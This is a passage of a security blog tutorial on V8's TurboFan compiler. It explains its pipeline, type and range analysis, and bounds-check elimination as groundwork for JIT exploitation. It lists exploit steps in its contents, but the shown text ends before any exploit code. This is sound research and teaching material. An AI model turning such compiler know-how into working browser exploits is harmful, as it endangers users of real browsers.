Introduction to TurboFan

Date: Mon 28 January 2019
By: Jeremy "__x86" Fetiveau
Category: exploitation
Tags: v8 turbofan exploitation

Introduction

Ages ago I wrote a blog post here called "First dip in the kernel pool"; this year we're going to swim in a sea of nodes! The current trend is to attack JavaScript engines and, more specifically, optimizing JIT compilers such as V8's TurboFan, SpiderMonkey's IonMonkey, JavaScriptCore's Data Flow Graph (DFG) & Faster Than Light (FTL) or Chakra's Simple JIT & FullJIT.

In this article we're going to discuss TurboFan and play along with the sea of nodes structure it uses. Then, we'll study a vulnerable optimization pass written by @_tsuro for Google's CTF 2018 and write an exploit for it. We'll be doing that on an x64 Linux box, but the exploitation is exactly the same on Windows platforms (simply use a different shellcode!). If you want to follow along, you can check out the associated repo.

Table of contents:

- Introduction
- Setup
- Building v8
- The d8 shell
- Preparing Turbolizer
- Compilation pipeline
- Sea of Nodes
- Control edges
- Value edges
- Effect edges
- Experimenting with the optimization phases
- Playing with NumberAdd
- Graph builder phase
- Typer phase
- Type lowering
- Range types
- CheckBounds nodes
- Simplified lowering
- Playing with various addition opcodes
- SpeculativeSafeIntegerAdd
- SpeculativeNumberAdd
- Int32Add
- JSAdd
- NumberAdd
- The DuplicateAdditionReducer challenge
- Understanding the reduction
- Understanding the bug
- Precision loss with IEEE-754 doubles
- Exploitation
- Improving the primitive
- Step 0: Corrupting a FixedDoubleArray
- Step 1: Corrupting a JSArray and leaking an ArrayBuffer's backing store
- Step 2: Getting a fake object
- Step 3: Arbitrary read/write primitive
- Step 4: Overwriting WASM RWX memory
- Full exploit
- Conclusion
- Recommended reading

Setup

Building v8

Building v8 is very easy.
You can simply fetch the sources using depot tools and then build using the following commands: fetch v8 gclient sync ./build/install-build-deps.sh tools/dev/gm.py x64.release Please note that whenever you're updating the sources or checking out a specific commit, do gclient sync or you might be unable to build properly. The d8 shell A very convenient shell called d8 is provided with the engine. For faster builds, limit the compilation to this shell: ~/v8$ ./tools/dev/gm.py x64.release d8 Try it: ~/v8$ ./out/x64.release/d8 V8 version 7.3.0 (candidate) d8> print("hello doare") hello doare Many interesting flags are available. List them using d8 --help. In particular, v8 comes with runtime functions that you can call from JavaScript using the % prefix. To enable this syntax, you need to use the flag --allow-natives-syntax. Here is an example: $ d8 --allow-natives-syntax V8 version 7.3.0 (candidate) d8> let a = new Array('d','o','a','r','e') undefined d8> %DebugPrint(a) DebugPrint: 0x37599d40aee1: [JSArray] - map: 0x01717e082d91 <Map(PACKED_ELEMENTS)> [FastProperties] - prototype: 0x39ea1928fdb1 <JSArray[0]> - elements: 0x37599d40af11 <FixedArray[5]> [PACKED_ELEMENTS] - length: 5 - properties: 0x0dfc80380c19 <FixedArray[0]> { #length: 0x3731486801a1 <AccessorInfo> (const accessor descriptor) } - elements: 0x37599d40af11 <FixedArray[5]> { 0: 0x39ea1929d8d9 <String[#1]: d> 1: 0x39ea1929d8f1 <String[#1]: o> 2: 0x39ea1929d8c1 <String[#1]: a> 3: 0x39ea1929d909 <String[#1]: r> 4: 0x39ea1929d921 <String[#1]: e> } 0x1717e082d91: [Map] - type: JS_ARRAY_TYPE - instance size: 32 - inobject properties: 0 - elements kind: PACKED_ELEMENTS - unused property fields: 0 - enum length: invalid - back pointer: 0x01717e082d41 <Map(HOLEY_DOUBLE_ELEMENTS)> - prototype_validity cell: 0x373148680601 <Cell value= 1> - instance descriptors #1: 0x39ea192909f1 <DescriptorArray[1]> - layout descriptor: (nil) - transitions #1: 0x39ea192909c1 <TransitionArray[4]>Transition array #1: 0x0dfc80384b71 
<Symbol: (elements_transition_symbol)>: (transition to HOLEY_ELEMENTS) -> 0x01717e082de1 <Map(HOLEY_ELEMENTS)> - prototype: 0x39ea1928fdb1 <JSArray[0]> - constructor: 0x39ea1928fb79 <JSFunction Array (sfi = 0x37314868ab01)> - dependent code: 0x0dfc803802b9 <Other heap object (WEAK_FIXED_ARRAY_TYPE)> - construction counter: 0 ["d", "o", "a", "r", "e"] If you want to know about existing runtime functions, simply go to src/runtime/ and grep on all the RUNTIME_FUNCTION (this is the macro used to declare a new runtime function). Preparing Turbolizer Turbolizer is a tool that we are going to use to debug TurboFan's sea of nodes graph. cd tools/turbolizer npm i npm run-script build python -m SimpleHTTPServer When you execute a JavaScript file with --trace-turbo (use --trace-turbo-filter to limit to a specific function), a .cfg and a .json files are generated so that you can get a graph view of different optimization passes using Turbolizer. Simply go to the web interface using your favourite browser (which is Chromium of course) and select the file from the interface. Compilation pipeline Let's take the following code. let f = (o) => { var obj = [1,2,3]; var x = Math.ceil(Math.random()); return obj[o+x]; } for (let i = 0; i < 0x10000; ++i) { f(i); } We can trace optimizations with --trace-opt and observe that the function f will eventually get optimized by TurboFan as you can see below. 
$ d8 pipeline.js --trace-opt [marking 0x192ee849db41 <JSFunction (sfi = 0x192ee849d991)> for optimized recompilation, reason: small function, ICs with typeinfo: 4/4 (100%), generic ICs: 0/4 (0%)] [marking 0x28645d1801b1 <JSFunction f (sfi = 0x192ee849d9c9)> for optimized recompilation, reason: small function, ICs with typeinfo: 7/7 (100%), generic ICs: 2/7 (28%)] [compiling method 0x28645d1801b1 <JSFunction f (sfi = 0x192ee849d9c9)> using TurboFan] [optimizing 0x28645d1801b1 <JSFunction f (sfi = 0x192ee849d9c9)> - took 23.583, 25.899, 0.444 ms] [completed optimizing 0x28645d1801b1 <JSFunction f (sfi = 0x192ee849d9c9)>] [compiling method 0x192ee849db41 <JSFunction (sfi = 0x192ee849d991)> using TurboFan OSR] [optimizing 0x192ee849db41 <JSFunction (sfi = 0x192ee849d991)> - took 18.238, 87.603, 0.874 ms] We can look at the code object of the function before and after optimization using %DisassembleFunction. // before 0x17de4c02061: [Code] - map: 0x0868f07009d9 <Map> kind = BUILTIN name = InterpreterEntryTrampoline compiler = unknown address = 0x7ffd9c25d340 // after 0x17de4c82d81: [Code] - map: 0x0868f07009d9 <Map> kind = OPTIMIZED_FUNCTION stack_slots = 8 compiler = turbofan address = 0x7ffd9c25d340 What happens is that v8 first generates ignition bytecode. If the function gets executed a lot, TurboFan will generate some optimized code. Ignition instructions gather type feedback that will help for TurboFan's speculative optimizations. Speculative optimization means that the code generated will be made upon assumptions. For instance, if we've got a function move that is always used to move an object of type Player, optimized code generated by Turbofan will expect Player objects and will be very fast for this case. class Player{} class Wall{} function move(o) { // ... } player = new Player(); move(player) move(player) ... // ... optimize code! 
the move function handles very fast objects of type Player move(player) However, if 10 minutes later, for some reason, you move a Wall instead of a Player, that will break the assumptions originally made by TurboFan. The generated code was very fast, but could only handle Player objects. Therefore, it needs to be destroyed and some ignition bytecode will be generated instead. This is called deoptimization and it has a huge performance cost. If we keep moving both Wall and Player, TurboFan will take this into account and optimize again the code accordingly. Let's observe this behaviour using --trace-opt and --trace-deopt ! class Player{} class Wall{} function move(obj) { var tmp = obj.x + 42; var x = Math.random(); x += 1; return tmp + x; } for (var i = 0; i < 0x10000; ++i) { move(new Player()); } move(new Wall()); for (var i = 0; i < 0x10000; ++i) { move(new Wall()); } $ d8 deopt.js --trace-opt --trace-deopt [marking 0x1fb2b5c9df89 <JSFunction move (sfi = 0x1fb2b5c9dad9)> for optimized recompilation, reason: small function, ICs with typeinfo: 7/7 (100%), generic ICs: 0/7 (0%)] [compiling method 0x1fb2b5c9df89 <JSFunction move (sfi = 0x1fb2b5c9dad9)> using TurboFan] [optimizing 0x1fb2b5c9df89 <JSFunction move (sfi = 0x1fb2b5c9dad9)> - took 23.374, 15.701, 0.379 ms] [completed optimizing 0x1fb2b5c9df89 <JSFunction move (sfi = 0x1fb2b5c9dad9)>] // [...] [deoptimizing (DEOPT eager): begin 0x1fb2b5c9df89 <JSFunction move (sfi = 0x1fb2b5c9dad9)> (opt #0) @1, FP to SP delta: 24, caller sp: 0x7ffcd23cba98] ;;; deoptimize at <deopt.js:5:17>, wrong map // [...] 
[deoptimizing (eager): end 0x1fb2b5c9df89 <JSFunction move (sfi = 0x1fb2b5c9dad9)> @1 => node=0, pc=0x7fa245e11e60, caller sp=0x7ffcd23cba98, took 0.755 ms]
[marking 0x1fb2b5c9df89 <JSFunction move (sfi = 0x1fb2b5c9dad9)> for optimized recompilation, reason: small function, ICs with typeinfo: 7/7 (100%), generic ICs: 0/7 (0%)]
[compiling method 0x1fb2b5c9df89 <JSFunction move (sfi = 0x1fb2b5c9dad9)> using TurboFan]
[optimizing 0x1fb2b5c9df89 <JSFunction move (sfi = 0x1fb2b5c9dad9)> - took 11.599, 10.742, 0.573 ms]
[completed optimizing 0x1fb2b5c9df89 <JSFunction move (sfi = 0x1fb2b5c9dad9)>]
// [...]

The log clearly shows that when encountering the Wall object with a different map (understand "type"), it deoptimizes because the code was only meant to deal with Player objects.

If you are interested in learning more about this, I recommend having a look at the following resources: TurboFan Introduction to speculative optimization in v8, v8 behind the scenes, Shape and v8 resources.

Sea of Nodes

Just a few words on sea of nodes. TurboFan works on a program representation called a sea of nodes. Nodes can represent arithmetic operations, loads, stores, calls, constants, etc. There are three types of edges that we describe one by one below.

Control edges

Control edges are the same kind of edges that you find in Control Flow Graphs. They enable branches and loops.

Value edges

Value edges are the edges you find in Data Flow Graphs. They show value dependencies.

Effect edges

Effect edges order operations such as reading or writing states. In a scenario like obj[x] = obj[x] + 1 you need to read the property x before writing it. As such, there is an effect edge between the load and the store. Also, you need to increment the read property before storing it. Therefore, you need an effect edge between the load and the addition. In the end, the effect chain is load -> add -> store, as you can see below.
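Incidentally, the load -> add -> store ordering is observable from plain JavaScript. Here is a small sketch (logging accessors on an ordinary object, nothing V8-specific) that records the order in which the property is read and written:

```javascript
// Sketch: make the effect chain of `obj.x = obj.x + 1` observable by
// logging when the property is loaded and when it is stored.
const log = [];
const backing = { x: 1 };
const obj = {
  get x()  { log.push("load");  return backing.x; },
  set x(v) { log.push("store"); backing.x = v; },
};

obj.x = obj.x + 1;
// log is now ["load", "store"]: the read is ordered before the write,
// which is exactly the dependency the effect edge encodes.
```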
If you would like to learn more about this you may want to check this TechTalk on TurboFan JIT design or this blog post.

Experimenting with the optimization phases

In this article we want to focus on how v8 generates optimized code using TurboFan. As mentioned just before, TurboFan works with sea of nodes and we want to understand how this graph evolves through all the optimizations. This is particularly interesting to us because some very powerful security bugs have been found in this area. Recent TurboFan vulnerabilities include incorrect typing of Math.expm1, incorrect typing of String.(last)IndexOf (that I exploited here) and incorrect operation side-effect modeling.

In order to understand what happens, you really need to read the code. Here are a few places you want to look at in the source folder:

- src/builtins: where all the builtin functions such as Array#concat are implemented
- src/runtime: where all the runtime functions such as %DebugPrint are implemented
- src/interpreter/interpreter-generator.cc: where all the bytecode handlers are implemented
- src/compiler: main repository for TurboFan!
- src/compiler/pipeline.cc: the glue that builds the graph, runs every phase and optimization pass, etc.
- src/compiler/opcodes.h: macros that define all the opcodes used by TurboFan
- src/compiler/typer.cc: implements typing via the Typer reducer
- src/compiler/operation-typer.cc: implements some more typing, used by the Typer reducer
- src/compiler/simplified-lowering.cc: implements simplified lowering, where some CheckBounds elimination will be done

Playing with NumberAdd

Let's consider the following function:

function opt_me() {
  let x = Math.random();
  let y = x + 2;
  return y + 3;
}

Simply execute it a lot to trigger TurboFan, or manually force optimization with %OptimizeFunctionOnNextCall. Run your code with --trace-turbo to generate trace files for turbolizer.

Graph builder phase

We can look at the very first generated graph by selecting the "bytecode graph builder" option.
The JSCall node corresponds to the Math.random call and obviously the NumberConstant and SpeculativeNumberAdd nodes are generated because of both x+2 and y+3 statements. Typer phase After graph creation comes the optimization phases, which as the name implies run various optimization passes. An optimization pass can be called during several phases. One of its early optimization phase, is called the TyperPhase and is run by OptimizeGraph. The code is pretty self-explanatory. // pipeline.cc bool PipelineImpl::OptimizeGraph(Linkage* linkage) { PipelineData* data = this->data_; // Type the graph and keep the Typer running such that new nodes get // automatically typed when they are created. Run<TyperPhase>(data->CreateTyper()); // pipeline.cc struct TyperPhase { void Run(PipelineData* data, Zone* temp_zone, Typer* typer) { // [...] typer->Run(roots, &induction_vars); } }; When the Typer runs, it visits every node of the graph and tries to reduce them. // typer.cc void Typer::Run(const NodeVector& roots, LoopVariableOptimizer* induction_vars) { // [...] Visitor visitor(this, induction_vars); GraphReducer graph_reducer(zone(), graph()); graph_reducer.AddReducer(&visitor); for (Node* const root : roots) graph_reducer.ReduceNode(root); graph_reducer.ReduceGraph(); // [...] } class Typer::Visitor : public Reducer { // ... Reduction Reduce(Node* node) override { // calls visitors such as JSCallTyper } // typer.cc Type Typer::Visitor::JSCallTyper(Type fun, Typer* t) { if (!fun.IsHeapConstant() || !fun.AsHeapConstant()->Ref().IsJSFunction()) { return Type::NonInternal(); } JSFunctionRef function = fun.AsHeapConstant()->Ref().AsJSFunction(); if (!function.shared().HasBuiltinFunctionId()) { return Type::NonInternal(); } switch (function.shared().builtin_function_id()) { case BuiltinFunctionId::kMathRandom: return Type::PlainNumber(); So basically, the TyperPhase is going to call JSCallTyper on every single JSCall node that it visits. 
If we read the code of JSCallTyper, we see that whenever the called function is a builtin, it will associate a Type with it. For instance, in the case of a call to the MathRandom builtin, it knows that the expected return type is a Type::PlainNumber. Type Typer::Visitor::TypeNumberConstant(Node* node) { double number = OpParameter<double>(node->op()); return Type::NewConstant(number, zone()); } Type Type::NewConstant(double value, Zone* zone) { if (RangeType::IsInteger(value)) { return Range(value, value, zone); } else if (IsMinusZero(value)) { return Type::MinusZero(); } else if (std::isnan(value)) { return Type::NaN(); } DCHECK(OtherNumberConstantType::IsOtherNumberConstant(value)); return OtherNumberConstant(value, zone); } For the NumberConstant nodes it's easy. We simply read TypeNumberConstant. In most case, the type will be Range. What about those SpeculativeNumberAdd now? We need to look at the OperationTyper. #define SPECULATIVE_NUMBER_BINOP(Name) \ Type OperationTyper::Speculative##Name(Type lhs, Type rhs) { \ lhs = SpeculativeToNumber(lhs); \ rhs = SpeculativeToNumber(rhs); \ return Name(lhs, rhs); \ } SPECULATIVE_NUMBER_BINOP(NumberAdd) #undef SPECULATIVE_NUMBER_BINOP Type OperationTyper::SpeculativeToNumber(Type type) { return ToNumber(Type::Intersect(type, Type::NumberOrOddball(), zone())); } They end-up being reduced by OperationTyper::NumberAdd(Type lhs, Type rhs) (the return Name(lhs,rhs) becomes return NumberAdd(lhs, rhs) after pre-processing). To get the types of the right input node and the left input node, we call SpeculativeToNumber on both of them. To keep it simple, any kind of Type::Number will remain the same type (a PlainNumber being a Number, it will stay a PlainNumber). The Range(n,n) type will become a Number as well so that we end-up calling NumberAdd on two Number. NumberAdd mostly checks for some corner cases like if one of the two types is a MinusZero for instance. 
In most cases, the function will simply return the PlainNumber type. Okay done for the Typer phase! To sum up, everything happened in : - Typer::Visitor::JSCallTyper - OperationTyper::SpeculativeNumberAdd And this is how types are treated : - The type of JSCall(MathRandom) becomes a PlainNumber, - The type of NumberConstant[n] with n != NaN & n != -0 becomes a Range(n,n) - The type of a Range(n,n) is PlainNumber - The type of SpeculativeNumberAdd(PlainNumber, PlainNumber) is PlainNumber Now the graph looks like this : Type lowering In OptimizeGraph, the type lowering comes right after the typing. // pipeline.cc Run<TyperPhase>(data->CreateTyper()); RunPrintAndVerify(TyperPhase::phase_name()); Run<TypedLoweringPhase>(); RunPrintAndVerify(TypedLoweringPhase::phase_name()); This phase goes through even more reducers. // pipeline.cc TypedOptimization typed_optimization(&graph_reducer, data->dependencies(), data->jsgraph(), data->broker()); // [...] AddReducer(data, &graph_reducer, &dead_code_elimination); AddReducer(data, &graph_reducer, &create_lowering); AddReducer(data, &graph_reducer, &constant_folding_reducer); AddReducer(data, &graph_reducer, &typed_lowering); AddReducer(data, &graph_reducer, &typed_optimization); AddReducer(data, &graph_reducer, &simple_reducer); AddReducer(data, &graph_reducer, &checkpoint_elimination); AddReducer(data, &graph_reducer, &common_reducer); Let's have a look at the TypedOptimization and more specifically TypedOptimization::Reduce. When a node is visited and its opcode is IrOpcode::kSpeculativeNumberAdd, it calls ReduceSpeculativeNumberAdd. 
Reduction TypedOptimization::ReduceSpeculativeNumberAdd(Node* node) { Node* const lhs = NodeProperties::GetValueInput(node, 0); Node* const rhs = NodeProperties::GetValueInput(node, 1); Type const lhs_type = NodeProperties::GetType(lhs); Type const rhs_type = NodeProperties::GetType(rhs); NumberOperationHint hint = NumberOperationHintOf(node->op()); if ((hint == NumberOperationHint::kNumber || hint == NumberOperationHint::kNumberOrOddball) && BothAre(lhs_type, rhs_type, Type::PlainPrimitive()) && NeitherCanBe(lhs_type, rhs_type, Type::StringOrReceiver())) { // SpeculativeNumberAdd(x:-string, y:-string) => // NumberAdd(ToNumber(x), ToNumber(y)) Node* const toNum_lhs = ConvertPlainPrimitiveToNumber(lhs); Node* const toNum_rhs = ConvertPlainPrimitiveToNumber(rhs); Node* const value = graph()->NewNode(simplified()->NumberAdd(), toNum_lhs, toNum_rhs); ReplaceWithValue(node, value); return Replace(node); } return NoChange(); } In the case of our two nodes, both have a hint of NumberOperationHint::kNumber because their type is a PlainNumber. Both the right and left hand side types are PlainPrimitive (PlainNumber from the NumberConstant's Range and PlainNumber from the JSCall). Therefore, a new NumberAdd node is created and replaces the SpeculativeNumberAdd. Similarly, there is a JSTypedLowering::ReduceJSCall called when the JSTypedLowering reducer is visiting a JSCall node. Because the call target is a Code Stub Assembler implementation of a builtin function, TurboFan simply creates a LoadField node and change the opcode of the JSCall node to a Call opcode. It also adds new inputs to this node. Reduction JSTypedLowering::ReduceJSCall(Node* node) { // [...] // Check if {target} is a known JSFunction. // [...] // Load the context from the {target}. 
Node* context = effect = graph()->NewNode( simplified()->LoadField(AccessBuilder::ForJSFunctionContext()), target, effect, control); NodeProperties::ReplaceContextInput(node, context); // Update the effect dependency for the {node}. NodeProperties::ReplaceEffectInput(node, effect); // [...] // kMathRandom is a CSA builtin, not a CPP one // builtins-math-gen.cc:TF_BUILTIN(MathRandom, CodeStubAssembler) // builtins-definitions.h: TFJ(MathRandom, 0, kReceiver) } else if (shared.HasBuiltinId() && Builtins::HasCppImplementation(shared.builtin_id())) { // Patch {node} to a direct CEntry call. ReduceBuiltin(jsgraph(), node, shared.builtin_id(), arity, flags); } else if (shared.HasBuiltinId() && Builtins::KindOf(shared.builtin_id()) == Builtins::TFJ) { // Patch {node} to a direct code object call. Callable callable = Builtins::CallableFor( isolate(), static_cast<Builtins::Name>(shared.builtin_id())); CallDescriptor::Flags flags = CallDescriptor::kNeedsFrameState; const CallInterfaceDescriptor& descriptor = callable.descriptor(); auto call_descriptor = Linkage::GetStubCallDescriptor( graph()->zone(), descriptor, 1 + arity, flags); Node* stub_code = jsgraph()->HeapConstant(callable.code()); node->InsertInput(graph()->zone(), 0, stub_code); // Code object. node->InsertInput(graph()->zone(), 2, new_target); node->InsertInput(graph()->zone(), 3, argument_count); NodeProperties::ChangeOp(node, common()->Call(call_descriptor)); } // [...] return Changed(node); } Let's quickly check the sea of nodes to indeed observe the addition of the LoadField and the change of opcode of the node #25 (note that it is the same node as before, only the opcode changed). Range types Previously, we encountered various types including the Range type. However, it was always the case of Range(n,n) of size 1. 
Now let's consider the following code : function opt_me(b) { let x = 10; // [1] x0 = 10 if (b == "foo") x = 5; // [2] x1 = 5 // [3] x2 = phi(x0, x1) let y = x + 2; y = y + 1000; y = y * 2; return y; } So depending on b == "foo" being true or false, x will be either 10 or 5. In SSA form, each variable can be assigned only once. So x0 and x1 will be created for 10 and 5 at lines [1] and [2]. At line [3], the value of x (x2 in SSA) will be either x0 or x1, hence the need of a phi function. The statement x2 = phi(x0,x1) means that x2 can take the value of either x0 or x1. So what about types now? The type of the constant 10 (x0) is Range(10,10) and the range of constant 5 (x1) is Range(5,5). Without surprise, the type of the phi node is the union of the two ranges which is Range(5,10). Let's quickly draw a CFG graph in SSA form with typing. Okay, let's actually check this by reading the code. Type Typer::Visitor::TypePhi(Node* node) { int arity = node->op()->ValueInputCount(); Type type = Operand(node, 0); for (int i = 1; i < arity; ++i) { type = Type::Union(type, Operand(node, i), zone()); } return type; } The code looks exactly as we would expect it to be: simply the union of all of the input types! To understand the typing of the SpeculativeSafeIntegerAdd nodes, we need to go back to the OperationTyper implementation. In the case of SpeculativeSafeIntegerAdd(n,m), TurboFan does an AddRange(n.Min(), n.Max(), m.Min(), m.Max()). Type OperationTyper::SpeculativeSafeIntegerAdd(Type lhs, Type rhs) { Type result = SpeculativeNumberAdd(lhs, rhs); // If we have a Smi or Int32 feedback, the representation selection will // either truncate or it will check the inputs (i.e., deopt if not int32). // In either case the result will be in the safe integer range, so we // can bake in the type here. This needs to be in sync with // SimplifiedLowering::VisitSpeculativeAdditiveOp. 
return Type::Intersect(result, cache_->kSafeIntegerOrMinusZero, zone()); } Type OperationTyper::NumberAdd(Type lhs, Type rhs) { // [...] Type type = Type::None(); lhs = Type::Intersect(lhs, Type::PlainNumber(), zone()); rhs = Type::Intersect(rhs, Type::PlainNumber(), zone()); if (!lhs.IsNone() && !rhs.IsNone()) { if (lhs.Is(cache_->kInteger) && rhs.Is(cache_->kInteger)) { type = AddRanger(lhs.Min(), lhs.Max(), rhs.Min(), rhs.Max()); } // [...] return type; } AddRanger is the function that actually computes the min and max bounds of the Range. Type OperationTyper::AddRanger(double lhs_min, double lhs_max, double rhs_min, double rhs_max) { double results[4]; results[0] = lhs_min + rhs_min; results[1] = lhs_min + rhs_max; results[2] = lhs_max + rhs_min; results[3] = lhs_max + rhs_max; // Since none of the inputs can be -0, the result cannot be -0 either. // However, it can be nan (the sum of two infinities of opposite sign). // On the other hand, if none of the "results" above is nan, then the // actual result cannot be nan either. int nans = 0; for (int i = 0; i < 4; ++i) { if (std::isnan(results[i])) ++nans; } if (nans == 4) return Type::NaN(); Type type = Type::Range(array_min(results, 4), array_max(results, 4), zone()); if (nans > 0) type = Type::Union(type, Type::NaN(), zone()); // Examples: // [-inf, -inf] + [+inf, +inf] = NaN // [-inf, -inf] + [n, +inf] = [-inf, -inf] \/ NaN // [-inf, +inf] + [n, +inf] = [-inf, +inf] \/ NaN // [-inf, m] + [n, +inf] = [-inf, +inf] \/ NaN return type; } Done with the range analysis! CheckBounds nodes Our final experiment deals with CheckBounds nodes. Basically, nodes with a CheckBounds opcode add bound checks before loads and stores. 
Consider the following code:

function opt_me(b) {
  let values = [42,1337]; // HeapConstant <FixedArray[2]>
  let x = 10;             // NumberConstant[10]          | Range(10,10)
  if (b == "foo")
    x = 5;                // NumberConstant[5]           | Range(5,5)
                          // Phi                         | Range(5,10)
  let y = x + 2;          // SpeculativeSafeIntegerAdd   | Range(7,12)
  y = y + 1000;           // SpeculativeSafeIntegerAdd   | Range(1007,1012)
  y = y * 2;              // SpeculativeNumberMultiply   | Range(2014,2024)
  y = y & 10;             // SpeculativeNumberBitwiseAnd | Range(0,10)
  y = y / 3;              // SpeculativeNumberDivide     | PlainNumber[r][s][t]
  y = y & 1;              // SpeculativeNumberBitwiseAnd | Range(0,1)
  return values[y];       // CheckBounds                 | Range(0,1)
}

In order to prevent values[y] from using an out-of-bounds index, a CheckBounds node is generated. Here is what the sea of nodes graph looks like right after the escape analysis phase.

The cautious reader probably noticed something interesting about the range analysis. The type of the CheckBounds node is Range(0,1)! And also, the LoadElement has an input FixedArray HeapConstant of length 2. That leads us to an interesting phase: the simplified lowering.

Simplified lowering

When visiting a node with an IrOpcode::kCheckBounds opcode, the function VisitCheckBounds is going to get called. This function is responsible for CheckBounds elimination, which sounds interesting! Long story short, it compares inputs 0 (index) and 1 (length). If the index's minimum range value is greater than or equal to zero and its maximum range value is less than the length value, it triggers a DeferReplacement, which means that the CheckBounds node will eventually be removed!
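That redundancy condition can be modeled in a few lines of plain JavaScript (a hypothetical helper for illustration, not V8 code):

```javascript
// Hypothetical model of the simplified-lowering condition: the bounds
// check on `index` is redundant when the index's type range is provably
// inside [0, length).
function checkBoundsIsRedundant(indexMin, indexMax, lengthMin) {
  return indexMin >= 0 && indexMax < lengthMin;
}

// The example above: index typed Range(0,1), FixedArray of length 2.
checkBoundsIsRedundant(0, 1, 2);  // true: the check can be removed
checkBoundsIsRedundant(0, 2, 2);  // false: the check must stay
```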
void VisitCheckBounds(Node* node, SimplifiedLowering* lowering) {
  CheckParameters const& p = CheckParametersOf(node->op());
  Type const index_type = TypeOf(node->InputAt(0));
  Type const length_type = TypeOf(node->InputAt(1));
  if (length_type.Is(Type::Unsigned31())) {
    if (index_type.Is(Type::Integral32OrMinusZero())) {
      // Map -0 to 0, and the values in the [-2^31,-1] range to the
      // [2^31,2^32-1] range, which will be considered out-of-bounds
      // as well, because the {length_type} is limited to Unsigned31.
      VisitBinop(node, UseInfo::TruncatingWord32(),
                 MachineRepresentation::kWord32);
      if (lower()) {
        if (lowering->poisoning_level_ ==
                PoisoningMitigationLevel::kDontPoison &&
            (index_type.IsNone() || length_type.IsNone() ||
             (index_type.Min() >= 0.0 &&
              index_type.Max() < length_type.Min()))) {
          // The bounds check is redundant if we already know that
          // the index is within the bounds of [0.0, length[.
          DeferReplacement(node, node->InputAt(0));
        } else {
          NodeProperties::ChangeOp(
              node, simplified()->CheckedUint32Bounds(p.feedback()));
        }
      }
  // [...]
}

Once again, let's confirm that by playing with the graph. We want to look at the CheckBounds before the simplified lowering and observe its inputs. We can easily see that Range(0,1).Max() < 2 and Range(0,1).Min() >= 0. Therefore, node 58 is going to be replaced, having been proven useless by the optimization pass's analysis. After simplified lowering, the graph looks like this:

Playing with various addition opcodes

If you look at the file src/compiler/opcodes.h, we can see various types of opcodes that correspond to some kind of add primitive.

V(JSAdd)
V(NumberAdd)
V(SpeculativeNumberAdd)
V(SpeculativeSafeIntegerAdd)
V(Int32Add)
// many more [...]

So, without going into too much detail, we're going to do one more experiment. Let's make small snippets of code that generate each one of these opcodes. For each one, we want to confirm we've got the expected opcode in the sea of nodes.
SpeculativeSafeIntegerAdd

let opt_me = (x) => {
  return x + 1;
}
for (var i = 0; i < 0x10000; ++i)
  opt_me(i);
%DebugPrint(opt_me);
%SystemBreak();

In this case, TurboFan speculates that x will be an integer. This guess is made due to the type feedback we mentioned earlier. Indeed, before TurboFan kicks in, v8 first quickly generates ignition bytecode that gathers type feedback.

$ d8 speculative_safeintegeradd.js --allow-natives-syntax --print-bytecode --print-bytecode-filter opt_me
[generated bytecode for function: opt_me]
Parameter count 2
Frame size 0
   13 E> 0xceb2389dc72 @ 0 : a5       StackCheck
   24 S> 0xceb2389dc73 @ 1 : 25 02    Ldar a0
   33 E> 0xceb2389dc75 @ 3 : 40 01 00 AddSmi [1], [0]
   37 S> 0xceb2389dc78 @ 6 : a9       Return
Constant pool (size = 0)
Handler Table (size = 0)

The x + 1 statement is represented by the AddSmi ignition opcode. If you want to know more, Franziska Hinkelmann wrote a blog post about ignition bytecode. Let's read the code to quickly understand the semantics.

// Adds an immediate value <imm> to the value in the accumulator.
IGNITION_HANDLER(AddSmi, InterpreterBinaryOpAssembler) {
  BinaryOpSmiWithFeedback(&BinaryOpAssembler::Generate_AddWithFeedback);
}

This code means that every time this ignition opcode is executed, it will gather type feedback to enable TurboFan's speculative optimizations. We can examine the type feedback vector (which is the structure containing the profiling data) of a function by using %DebugPrint or the job gdb command on a tagged pointer to a FeedbackVector.

DebugPrint: 0x129ab460af59: [Function]
// [...]
 - feedback vector: 0x1a5d13f1dd91: [FeedbackVector] in OldSpace
// [...]

gef➤ job 0x1a5d13f1dd91
0x1a5d13f1dd91: [FeedbackVector] in OldSpace
// ...
 - slot #0 BinaryOp BinaryOp:SignedSmall { // actual type feedback
     [0]: 1
   }

Thanks to this profiling, TurboFan knows it can generate a SpeculativeSafeIntegerAdd.
This is exactly the reason why it is called speculative optimization (TurboFan makes guesses and assumptions based on this profiling). However, once optimized, if opt_me is called with a completely different parameter type, there will be a deoptimization.

SpeculativeNumberAdd

let opt_me = (x) => {
  return x + 1000000000000;
}
opt_me(42);
%OptimizeFunctionOnNextCall(opt_me);
opt_me(4242);

If we modify the previous code snippet a bit and use a larger value that can't be represented by a small integer (Smi), we'll get a SpeculativeNumberAdd instead. TurboFan speculates about the type of x and relies on type feedback.

Int32Add

let opt_me = (x) => {
  let y = x ? 10 : 20;
  return y + 100;
}
opt_me(true);
%OptimizeFunctionOnNextCall(opt_me);
opt_me(false);

At first, the addition y + 100 relies on speculation. Thus, the opcode SpeculativeSafeIntegerAdd is being used. However, during the simplified lowering phase, TurboFan understands that y + 100 is always going to be an addition between two 32-bit integers, thus lowering the node to an Int32Add.

[Graphs before and after the lowering]

JSAdd

let opt_me = (x) => {
  let y = x ?
    ({valueOf() { return 10; }})
    :
    ({[Symbol.toPrimitive]() { return 20; }});
  return y + 1;
}
opt_me(true);
%OptimizeFunctionOnNextCall(opt_me);
opt_me(false);

In this case, y is a complex object and we need to call a slow JSAdd opcode to deal with this kind of situation.

NumberAdd

let opt_me = (x) => {
  let y = x ? 10 : 20;
  return y + 1000000000000;
}
opt_me(true);
%OptimizeFunctionOnNextCall(opt_me);
opt_me(false);

Like in the SpeculativeNumberAdd example, we add a value that can't be represented by a small integer (Smi). However, this time there is no speculation involved. There is no need for any kind of type feedback since we can guarantee that y is an integer. There is no way to make y anything other than an integer.
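As a side note, the operands from the JSAdd example can be exercised in plain JavaScript: both user-defined conversion hooks really do run during the addition, which is why TurboFan has to fall back to a generic JSAdd instead of a numeric add. A small runnable sketch:

```javascript
// Sketch: the two "complex" operands from the JSAdd example. Adding 1
// to them goes through the user-defined conversion hooks (valueOf /
// Symbol.toPrimitive) rather than a plain numeric addition.
const viaValueOf = { valueOf() { return 10; } };
const viaToPrimitive = { [Symbol.toPrimitive]() { return 20; } };

const r1 = viaValueOf + 1;      // 11
const r2 = viaToPrimitive + 1;  // 21
```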
